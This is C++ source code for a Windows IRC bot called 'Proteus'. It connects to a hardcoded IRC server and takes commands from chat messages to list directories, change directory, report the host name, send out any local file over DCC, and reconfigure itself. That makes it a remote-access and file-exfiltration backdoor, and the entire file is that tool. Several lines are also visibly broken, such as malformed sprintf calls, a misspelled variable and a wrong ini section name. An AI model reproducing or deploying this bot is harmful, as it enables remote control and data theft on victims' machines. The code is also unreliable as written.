#include<stdio.h>
#include<string.h>
#include<windows.h>
#pragma comment(lib,"wsock32")
#define TABLE_SIZE 10

struct {char *file;int port;int size; DWORD offset;}file_table[TABLE_SIZE];

CRITICAL_SECTION section;

class Parser{
	char *slack,*start; int count;
public:
	Parser(char*);
	char *GetSlack();
	char *GetAt(int);
	char *operator[] (int index) { return GetAt(index);}
};

Parser::Parser(char*line)
{
	char sym,old=0; slack=0; count=0;
	start=0; start=line;
	for(;;){
		sym=*line;
		if((sym==' ' || !sym) && old!=' ') count++,*line=0; if(!sym) break;
		if(old==' ' && sym==':') {slack=line+1; break;}
		old=sym; line++;
	}
}

char* Parser::GetSlack()
{
	return slack;
}

char *Parser::GetAt(int index)
{
	if(index>=count) return "";
	char *line=start;
	while(index--) line=strchr(line,0)+1;
	while(*line==' ') line++;
	return line;	
}


DWORD _stdcall Thread(void *arg)
{
	char buffer[1024]; int port; char *filename;
	TIMEVAL time;fd_set set; DWORD offset,size,check; FILE *file; int t;
	EnterCriticalSection(&section);
	int index=(int)arg;
	port=file_table[index].port;
	size=file_table[index].size;
	offset=file_table[index].offset;
	filename=file_table[index].file;
	delete file_table[index].file; file_table[index].file=0;
//	delete file_table[index].nick;
	LeaveCriticalSection(&section);
	time.tv_sec=100;time.tv_usec=0;
	sockaddr_in addr; SOCKET sock1=0,sock2=0;
	sock1=socket(AF_INET,SOCK_STREAM,0);
	addr.sin_family=AF_INET;
	addr.sin_addr.S_un.S_addr=INADDR_ANY;
	addr.sin_port=htons(port);
	if(bind(sock1,(sockaddr*)&addr,sizeof(addr))) goto exit;
	listen(sock1,1);FD_ZERO(&set);FD_SET(sock1,&set);
	t=select(0,&set,0,0,&time); if(!t) goto exit;
	sock2=accept(sock1,0,0); closesocket(sock1);
	file=fopen(filename,"rb"); if(!file) goto exit;
	fseek(file,offset,SEEK_SET);
	while(offset<size){
		t=size-offset;
		if(t>1024) t=1024;
		fread(buffer,1,t,file);
		if(send(sock2,buffer,t,0)!=t) break;
		offset+=t;
		recv(sock2,(char*)&check,sizeof(check),0);
		if(offset!=htonl(check)) break;
	}
	fclose(file);
exit:
	if(sock1) closesocket(sock1);
	if(sock2) closesocket(sock2);
	return 0;
}





class IRC {
	SOCKET sock;
	int m_xmode;
	char m_server[30];
	char m_join[30];
	char m_key[30];
	char m_nick[30],m_curr_nick[30];
	char m_mail[50];
	int Connect();
	void LoadSetup();
	void Disconn();
	int Recv(int budy=0);	//     
	int Send(char*);		//  
	int ParseLine(char*,int busy=0);	//   
	int Pong(char*);				// pong ( _
	int ParseSignal(char *line);	//   (  )
	int ParseMsg(char *line,char *who);	//  
	int cmd_Dir(char*,int);
	int cmd_Exit(char*);
	int cmd_Cd(char*,char*);
	int cmd_Pwd(char*);
	int cmd_Host(char*);
	int cmd_SetServer(char*);
	int cmd_SetJoin(char*);
	int cmd_SetKey(char*);
	int cmd_SetX(char*);
	int cmd_GetFile(char*,char*);
	int cmd_SetNick(char*);
	int Resume(char *who,char *file,int port,DWORD position);	//    
	int cmd_Raw(char *line);
	int GetFreePort();	//   
	int SendMsg(char *who,char *text,char *prefix="");	//    ...
public:
	IRC() { sock=0; LoadSetup();}
	~IRC() { Disconn();}
	void Start();
};


void IRC::LoadSetup()
{
	char nick[30]; srand(GetTickCount());
	sprintf(nick,"Proteus%d",rand()%100000);
	GetPrivateProfileString("optons","server","irc.degunino.net",m_server,sizeof(m_server),".\\irc.ini");
	GetPrivateProfileString("optons","join","#unix",m_join,sizeof(m_join),".\\irc.ini");
	GetPrivateProfileString("optons","key","",m_key,sizeof(m_key),".\\irc.ini");
	GetPrivateProfileString("optons","nick",nick,m_nick,sizeof(m_nick),".\\irc.ini");
	GetPrivateProfileString("optons","mail","default@mail.ru",m_mail,sizeof(m_mail),".\\irc.ini");
	m_xmode=GetPrivateProfileInt("options","xmode",0,".\\irc.ini");
}


int IRC::SendMsg(char *who,char *text,char *prefix)
{
	char buffer[200];
	if(_snprintf(buffer,sizeof(buffer),"PRIVMSG %s :%s%s\r\n",prefix,text)<0) return 1;
	return Send(buffer);
}


int IRC::GetFreePort()
{
	sockaddr_in addr; SOCKET sock; int len;
	sock=socket(AF_INET,SOCK_STREAM,0); memset(&addr,0,sizeof(addr));
	addr.sin_family=AF_INET;
	bind(sock,(sockaddr*)&addr,sizeof(addr));
	len=sizeof(addr); getsockname (sock,(sockaddr*)&addr,&len); 
	closesocket(sock);
	return htons(addr.sin_port);
}


int IRC::Connect()
{
	sockaddr_in addr; HOSTENT *ph;
	ph=gethostbyname(m_server); if(!ph) return 1;
	sock=socket(AF_INET,SOCK_STREAM,0);
	addr.sin_family=AF_INET;
	addr.sin_port=htons(6667);
	addr.sin_addr.S_un.S_addr=*(DWORD*)ph->h_addr_list[0];
	if(!connect(sock,(sockaddr*)&addr,sizeof(addr))) return 0;
	Disconn(); return 1;
}


int IRC::Send(char *line)
{
#ifdef _DEBUG
	printf(">> %s",line);
#endif
	int len=strlen(line);
	if(send(sock,line,strlen(line),0)==len) return 0;
	Disconn();
	return 1;
}

void IRC::Disconn()
{
	if(sock) closesocket(sock);
	sock=0;
}


void IRC::Start()
{
	char buffer[100],host[30],mail[50],*mail_host;
	if(Connect()) return;
	strcpy(m_curr_nick,m_nick);
	sprintf(buffer,"NICK %s\r\n",m_nick); if(Send(buffer))return;
	gethostname(host,sizeof(host)); strcpy(mail,m_mail);
	mail_host=strchr(mail,'@'); if(mail_host) *mail_host++=0; else mail_host="";
	if(!mail[0] && !*mail_host) strcpy(mail,"default"),mail_host="mail.ru";
	sprintf(buffer,"USER %s \"%s\" \"%s\" :%s\r\n",mail,mail_host,m_server,host);
	if(Send(buffer)) return;
	while(Recv());
}


int IRC::Recv(BOOL busy)
{
	char buffer[1024*2]; int n;
	n=recv(sock,buffer,sizeof(buffer)-1,0); if(n<0) return 0;
	buffer[n]=0;
#ifdef _DEBUG
	printf("%s",buffer);
#endif
	char *start,*end,sym;
	start=buffer;
	for(;;) {
		while(*start=='\r' || *start=='\n') start++; if(!*start) break;
		end=start; while(*end!='\r' && *end!='\n' && *end) end++; sym=*end;
		*end=0; if(ParseLine(start,busy)) return 0;
		if(!sym) break; start=end+1;
	}
	return 1;
}


int IRC::ParseLine(char *line,int busy)
{
	Parser arg(line);
	if(!stricmp(arg[0],"ping")) return Pong(arg.GetSlack());
	if(busy) return 0;
	if(!stricmp(arg[1],"privmsg")) return ParseMsg(arg.GetSlack(),arg[0]);
	return ParseSignal(arg[1]);
}

int IRC::ParseSignal(char *line)
{
	char buffer[100];
	int n,code=0,t;
	for(n=0; n<3; n++) { t=(BYTE)(*line++-'0'); if(t>9) return 0; code=code*10+t;}
	if(*line) return 0;
	switch(code) {
	case 1: //   
		sprintf(buffer,"MODE %s +x\r\n",m_curr_nick);
		if(m_xmode && Send(buffer)) return 1;
		sprintf(buffer,"JOIN %s %s\r\n",m_join,m_key);
		return Send(buffer);
	case 433: //  
		sprintf(m_curr_nick,"Proteus_%d",rand()%100000);
		sprintf(buffer,"NICK %s\r\n",m_curr_nick);
		return Send(buffer);
	}
	return 0;
}

int IRC::Pong(char *text)
{
	char buffer[30];
	sprintf(buffer,"PONG :%s\r\n",text); return Send(buffer);
}


int IRC::ParseMsg(char *line,char *who)
{
	const char *list[]={".dir",".exit",".cd",".pwd",".host",".set-server",".set-join",".set-key",".set-x",".get-file",".set-nick",".raw","\1dcc",0};
	int n; if(*who==':') who++;
	char *ref=strchr(who,'!'); if(ref) *ref=0;
	Parser arg(line); char *arg1=arg[1];
	for(n=0; list[n]; n++) if(!stricmp(arg[0],list[n])) break;
	switch(n) {
	case 0: return cmd_Dir(who,atoi(arg1));
	case 1: return cmd_Exit(arg1);
	case 2: return cmd_Cd(who,arg1);
	case 3: return cmd_Pwd(who);
	case 4: return cmd_Host(who);
	case 5: return cmd_SetServer(arg1);
	case 6: return cmd_SetJoin(arg1);
	case 7: return cmd_SetKey(arg1);
	case 8: return cmd_SetX(arg1);
	case 9: return cmd_GetFile(who,arg.GetSlack());
	case 10: return cmd_SetNick(arg1);
	case 11: return cmd_Raw(arg.GetSlack());
	case 12: if(!stricmp(arg1,"resume")) return Resume(who,arg[2],atoi(arg[3]),atoi(arg[4])); break;
	}
	return 0;
}


int IRC::cmd_Raw(char *line)
{
	return Send(line);
}

//PRIVMSG User1 :DCC RESUME filename port position
//PRIVMSG User2 :DCC ACCEPT filename port position 
int IRC::Resume(char *who,char *file,int port,DWORD offset)
{
	int n; char buffer[100];
	for(n=0; n<TABLE_SIZE; n++) if(file_table[n].file && file_table[n].port==port) break;
	if(n>=TABLE_SIZE) return 0;
	file_table[n].offset=offset;
	sprintf(buffer,"PRIVMSG %s :\1DCC ACCEPT %s %d %u\1\r\n",who,file,port,offset);
	return Send(buffer);
}

int IRC::cmd_Dir(char* who,int limit)
{
	WIN32_FIND_DATA data; 
	if(limit<10) limit=10;
	HANDLE hand=FindFirstFile( "*",&data);
	while(FindNextFile(hand,&data))
	{
		limit--;
		if(SendMsg(who,data.cFileName,"> ")) return 1;
		if(limit<0) break;
		Recv(1);
		Sleep(100);
	}
	FindClose(hand);
	return 0;
}

int IRC::cmd_Exit(char *reason)
{
	char buffer[100];
	sprintf(buffer,"QUIT :%s\r\n",reason);
	Send(buffer); Disconn(); return 1;
}

int IRC::cmd_Cd(char *who,char *arg1)
{
	SetCurrentDirectory(arg1);
	return cmd_Pwd(who);
}
	
int IRC::cmd_Pwd(char *who)
{
	char path[100];
	GetCurrentDirectory(sizeof(path),path);
	return SendMsg(who,path,"dir=");
}

int IRC::cmd_Host(char *who)
{
	char host[30];
	gethostname(host,sizeof(host));
	return SendMsg(who,host,"host=");
}


int IRC::cmd_SetServer(char *arg1)
{
	strcpy(m_server,arg1);
	WritePrivateProfileString("options","server",m_server,".\\irc.ini");
	return 0;
}

int IRC::cmd_SetJoin(char *arg1)
{
	strcpy(m_join,arg1);
	WritePrivateProfileString("options","join",m_join,".\\irc.ini");
	return 0;
}

int IRC::cmd_SetKey(char *arg1)
{
	strcpy(m_key,arg1);
	WritePrivateProfileString("options","key",m_key,".\\irc.ini");
	return 0;
}

int IRC::cmd_SetX(char *arg1)
{
	m_xmode=atoi(arg1);
	WritePrivateProfileString("options","xmode",arg1,".\\irc.ini");
	return 0;
}


int IRC::cmd_GetFile(char *who,char *arg1)
{
	HOSTENT *ph; int index;
	char buffer[100],host[30],*temp; int port; DWORD ip,size,id;
	if(SendMsg(who,arg1,"FILE: ")) return 1;
	FILE *file=fopen(arg1,"rb"); if(!file) return SendMsg(who,"not found!");
	fseek(file,0,SEEK_END); size=ftell(file); fclose(file);
	sprintf(buffer,"PRIVMSG %s :FILE_SIZE=%u\r\n",who,size); if(Send(buffer)) return 1;
	temp=strrchr(arg1,'\\'); if(temp) temp++; else temp=arg1;
	gethostname(host,sizeof(host));
	ph=gethostbyname(host); if(!ph) return SendMsg(who,"Internal error");
	ip=htonl(*(DWORD*)ph->h_addr_list[0]);
	port=GetFreePort();
	EnterCriticalSection(&section);
	for(index=0; index<TABLE_SIZE; index++) if(!file_table[index].file) break;
	if(index>=TABLE_SIZE) {LeaveCriticalSection(&section);return SendMsg(who,"Not slots available");}
	file_table[index].port=port;
	file_table[index].size=size;
	file_table[index].offset=0;
//	file_table[index].nick=strdup(who);
	file_table[index].file=strdup(arg1);
	LeaveCriticalSection(&section);
	sprintf(buffer,"PRIVMSG %s :\1DCC SEND %s %u %d %u\1\r\n",who,temp,ip,port,size);
	if(Send(buffer)) return 1;
	CreateThread(0,0,Thread,0,0,&id);
	return 0;
}


int IRC::cmd_SetNick(char *arg1)
{
	strcpy(m_nick,arg1); char buffet[100];
	WritePrivateProfileString("options","nick",m_nick,".\\irc.ini");
	strcpy(m_curr_nick,arg1);
	sprintf("NICK %s\r\n",arg1); return Send(buffer);
}



void main()
{
	IRC irc;
	WSADATA wsa; WSAStartup(0x202,&wsa); InitializeCriticalSection(&section);
	memset(file_table,0,sizeof(file_table));
	irc.Start();
	DeleteCriticalSection(&section);
}


